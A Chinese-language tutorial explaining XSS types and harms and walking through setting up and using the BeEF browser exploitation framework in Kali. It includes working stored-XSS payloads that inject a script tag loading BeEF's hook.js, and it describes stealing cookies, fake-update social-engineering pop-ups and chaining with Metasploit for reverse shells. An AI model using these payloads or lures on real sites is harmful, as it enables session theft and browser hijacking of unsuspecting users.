今天主要聊一下,从认识xss的危害到beef-xss的利用
beef是一个类似与sql注入的sqlmap一样,也是一种工具。
一、xss简介
定义: 跨站脚本攻击。xss是一种在web应用中的计算机安全漏洞,
它允许web用户将一些恶意代码植入到提供给其它用户使用的页面中
种类:
反射型xss:
提交得数据成功的实现了xss,但是仅仅是对你这次访问产生了影响,是非持久型攻击
存储型xss:
你提交的数据成功实现了xss,存入了数据库,别人访问这个页面的时候就会自动触发
Dom型xss:
经过一种编码的xss,详情: https://t.cn/A6Apaxi8
二、认识xss的危害
危害:
盗取cookie(主要)
获取内网ip
获取浏览器保存的明文密码
截取网页屏幕
网页上记录键盘
。。。
等等很多,这仅仅是常见的
三、beef-xss简介
定义:
一款浏览器攻击框架,利用Ruby语言开发的,
kali中默认安装的一个模块
用于实现对xss漏洞的攻击和利用
简单说,
Beef-xss是对xss漏洞的最大化利用,
直接获取对方系统信息以及作为社会工程学工具进行利用
题外话,
其实beef最经典的还是他的打开图像(一个牛)
四、beef-xss使用
启动步骤: (kali环境中)
第一:进入beef文件夹 cd /usr/share/beef-xss/
补充:可以看看该文件夹都有什么文件
beef --- 主程序
xxx.pem --- 证书
.yaml --- 配置文件
db --- 数据库
modules --- 模块
extensions --- 利用工具
第二:启动beef ./beef
补充:第一次使用会提示修改默认密码(beef)
如何修改?
cd /usr/share/beef-xss/
leafpad config.yaml //leafpad是一款编辑器
此时应该以文本方式打开了该配置文件
找到,
user: "beef"
passwd: "beef"
随意修改为自己想改的,保存,关闭
第三:重启beef ./beef
最下边会有一些网址,如:
Hook URL: http://127.0.0.1:3000/hook.js
UI URL: http://127.0.0.1:3000/ui/panel
第一个是钩子----类似xss平台的一些连接
//不懂xss平台的可以去百度一下,很多实战教程估计
第二个是beef的网页登录连接,直接复制,浏览器打开即可
//简单说,就是beef的后台
网页功能的一些介绍
左上角的Hooked Browsers是受害者主机;
下边两个选项,即上线的,没上线的
中间的Getting Started是一些说明,即说明手册
Logs是日志 Zombies是监控
注意的一点,我们在打存储型xss的时候,如留言框处,不要留言http://127.0----/hook.js
而是这种:
<sCRiPt sRC=//127.0.0.1:3000/hook.js></sCrIpT>
</tExtArEa>'"><sCRiPt sRC=http://127.0.0.1:3000/hook.js></sCrIpT>
是不是很类似xss平台的一些平台? 其实本质原理都是一样的
问: 为什么要在钩子前加上<script>等等标签?
答:因为要执行js语句,不然怎么去加载执行你的恶意脚本
beef-控制台介绍:
~点击受害者主机,选择Commands选项(中间偏上的位置)
~看到一些灯(红的、白的、绿的、橙的)
//其实是每个命令模块都有一个交通灯图标,用于指示以下内容
绿色:命令模块对目标起作用,对用户应该是不可见的
橙色:命令模块对目标起作用,但可能对用户可见
白是:尚未针对此目标验证命令模块
红色:命令模块不适用于此目标
常用模块:
~浏览器(browser)
~持续控制(Persistentce)
~社会工程学(Social Engineering)
多提一下这个社工模块,
可以让浏览器弹窗显示 “XXX” 可以更新了,
管理员一点击更新,就会下载一些咱们 让他下载的东西
这种模仿,几乎可以以假乱真。所以,也多提一下
工具的使用,一定要在有授权的情况下,大家心里有个数
根据这些功能可以产生非常大的危害,因为本质上xss的危害就是操纵浏览器,浏览器可以一定程度上操纵计算机。
而beef就是一个集成了xss危害的工具。除了上边提到的一些偷cookie之外还可以干的很多
比如,让受害者主机播放你想让他播放的音乐、获取网页源码、持续控制、社会工程学等等
在多说一下,这个beef可以搭配msf使用,产生更大的危害,如反弹shell